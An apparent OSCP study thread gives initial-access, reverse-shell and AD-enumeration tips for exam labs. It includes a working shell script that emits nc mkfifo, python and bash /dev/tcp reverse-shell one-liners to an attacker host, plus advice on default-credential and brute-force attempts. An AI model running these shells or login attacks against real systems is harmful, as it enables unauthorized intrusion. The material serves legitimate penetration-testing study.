LEARNING OSCP: Day #8
Initial Access tips #1 1. Don't rely on a single wordlist. I had instances where I couldn't find a hidden directory with the DirBuster list; I got it when I ran with the dirb big.txt. 2. Don't forget to add file extensions when fuzzing directories: php, txt, html, etc. (whatever the server-side language and the site's content suggest). #oscp
3. Try default passwords on every login function: ftp, ssh, mysql, smb, webdav, pop, etc. Search for the default credentials of the specific web software you identified and, if the documented ones don't work, make an educated guess based on the product or hostname. 4. Always check the page source (HTML comments, included scripts, config files) for usernames, passwords, etc.
5. Brute-force every authenticated service with any strings you have collected that look like usernames. 6. Use README.txt/LICENSE.txt/CHANGELOG.txt shipped with a web application to pin down its version. 7. Not every exploit is on searchsploit; custom exploits found through Google/GitHub often work fine (read them before running them).
8. Port 4444 doesn't always work for a reverse connection, because outbound traffic may be filtered; target common ports like 80/443 (or the port the current service runs on), which are likely to be allowed out. 9. I prefer the nc mkfifo payload as it works most of the time, but keep trying others like python and php if it doesn't.
10. If a payload doesn't work, check whether the command is actually installed on the machine with 'which nc' or 'whereis nc'. Use the name or full path that is reported and try the payload again. 11. Always read the web content carefully; there may be hints for the next steps.
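Tip 2 is worth automating: the list below is an added example (not from the thread) that expands a plain directory wordlist with a set of extensions, the way gobuster -x and dirb -X do internally, so the same expanded list can be fed to any fuzzer. The wordlist path and extension set in the usage line are placeholders.

```shell
#!/bin/sh
# Added example: expand each word in a wordlist (stdin) into the bare name plus
# name.EXT for every extension given. Blank lines and '#' comment lines (dirb's
# lists start with a few) are skipped.

# expand_wordlist EXT1,EXT2,...   (reads words from stdin, writes to stdout)
expand_wordlist() {
  exts=$(printf '%s' "$1" | tr ',' ' ')
  while IFS= read -r word; do
    [ -n "$word" ] || continue                 # skip blank lines
    case $word in "#"*) continue ;; esac       # skip comment/header lines
    printf '%s\n' "$word"                      # bare directory or file name
    for e in $exts; do
      printf '%s.%s\n' "$word" "$e"            # name.php, name.txt, ...
    done
  done
}

# Example usage (placeholder paths): build an expanded list from dirb's big.txt
# and feed it to whatever fuzzer you use. Each extension multiplies the request
# count, so keep the set small and matched to the target (php for a PHP app,
# aspx for IIS, etc.).
if [ -r /usr/share/wordlists/dirb/big.txt ]; then
  expand_wordlist php,txt,html < /usr/share/wordlists/dirb/big.txt > big_ext.txt
fi
```

Note that the expanded list contains the original words unchanged, so nothing found with the plain list is lost; it only adds the extension variants.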
For initial access: 1. Start with the box that has a web server; it is the most common path. 2. Use revshells.com for PowerShell payloads; I prefer the base64 one. 3. Just remember Windows uses '\' rather than '/' in paths; don't mess up the syntax (C:\Users, not C:/Users).
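Tips 8 to 10 above (pick a callback port that is likely allowed out, start with the nc mkfifo payload, and check that the interpreter really exists before blaming the payload) can be rolled into one small script. This is an added example, not from the thread or from revshells.com; LHOST 10.10.14.2 and LPORT 443 are placeholders, and the payload strings are the common one-liners for nc, python and bash.

```shell
#!/bin/sh
# Added example: choose a reverse-shell one-liner for a Linux target based on
# what is actually installed there. Run it on the target (or paste the
# functions into the foothold shell) after starting a listener on the attacking
# machine, e.g.  nc -lvnp 443

# payload_nc_mkfifo LHOST LPORT NC_PATH
# Works with netcat builds that lack -e: the fifo carries the listener's input
# into /bin/sh, and the shell's output is piped back out through nc.
payload_nc_mkfifo() {
  printf 'rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | %s %s %s > /tmp/f' "$3" "$1" "$2"
}

# payload_python LHOST LPORT PYTHON_PATH
# Connects a socket and dup2()s it over stdin/stdout/stderr of an interactive sh.
payload_python() {
  printf "%s -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"%s\",%s));[os.dup2(s.fileno(),i) for i in (0,1,2)];subprocess.call([\"/bin/sh\",\"-i\"])'" "$3" "$1" "$2"
}

# payload_bash LHOST LPORT BASH_PATH
# /dev/tcp is a bash feature, so the one-liner is wrapped in 'bash -c' to work
# even when the foothold shell is plain sh.
payload_bash() {
  printf "%s -c '%s -i >& /dev/tcp/%s/%s 0>&1'" "$3" "$3" "$1" "$2"
}

# pick_revshell LHOST LPORT
# Tip 10: 'command -v' is the POSIX equivalent of 'which'; use the full path it
# reports instead of a bare name, since the target's PATH may not include it.
pick_revshell() {
  lhost=$1; lport=$2
  for cand in nc ncat netcat; do
    p=$(command -v "$cand" 2>/dev/null) && { payload_nc_mkfifo "$lhost" "$lport" "$p"; return 0; }
  done
  for cand in python3 python; do
    p=$(command -v "$cand" 2>/dev/null) && { payload_python "$lhost" "$lport" "$p"; return 0; }
  done
  p=$(command -v bash 2>/dev/null) && { payload_bash "$lhost" "$lport" "$p"; return 0; }
  echo "no nc/python/bash found; try php, perl or socat next" >&2
  return 1
}

# Usage (placeholder attacker IP and port):  sh pick_revshell.sh 10.10.14.2 443
if [ $# -ge 2 ]; then
  pick_revshell "$1" "$2"
fi
```

If nothing comes back on 443, the interpreter check has already ruled out the usual culprit, so the next thing to vary is the port (tip 8): try the port of the service you came in through before assuming the payload itself is broken.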
For AD enumeration: 1. Use adPEAS; like linPEAS and winPEAS, it is a PowerShell script that automates domain information gathering and the search for lateral-movement vectors: github.com/61106960/adPEAS 2. I would recommend performing the enumeration manually before using it, to understand it better.
It teaches you about connection tools like netcat, socat, PowerShell and Powercat, and how to use them in practice for file transfers, reverse/bind listeners, and redirecting I/O.
We also learn to write simple bash scripts for automation. There are practical exercises for each module.
The passive information gathering module isn't much of a requirement for the exam, though it covers some useful tools like Google dorks and Shodan that might help.
Active information gathering is useful for DNS, SMB, port scanning, NFS, SMTP and SNMP enumeration.